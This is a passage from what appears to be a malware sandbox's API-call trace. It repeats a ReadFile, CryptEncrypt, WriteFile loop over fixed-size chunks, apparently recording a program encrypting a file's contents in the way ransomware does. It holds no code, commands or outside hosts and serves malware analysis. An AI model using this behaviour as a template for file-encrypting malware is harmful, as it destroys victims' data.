nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.176] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.176] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.177] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.177] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.177] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.177] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.177] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.178] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.178] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.178] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.178] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.179] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.179] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.179] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.179] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.179] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.180] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.180] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.180] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.180] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.181] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.181] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.181] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.181] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.181] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.181] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.182] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.182] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.182] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.182] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.182] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.182] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.183] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.183] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, nNumberOfBytesToWrite=0x380, lpNumberOfBytesWritten=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesWritten=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] ReadFile (in: hFile=0x5d48, lpBuffer=0x277e300, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9ce68, lpOverlapped=0x0 | out: lpBuffer=0x277e300*, lpNumberOfBytesRead=0x2b9ce68*=0x380, lpOverlapped=0x0) returned 1 [0276.184] CryptEncrypt (in: hKey=0x2fb3c8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380, dwBufLen=0x400 | out: pbData=0x277e300*, pdwDataLen=0x2b9ce68*=0x380) returned 1 [0276.184] WriteFile (in: hFile=0x5d3c, lpBuffer=0x277e300*, 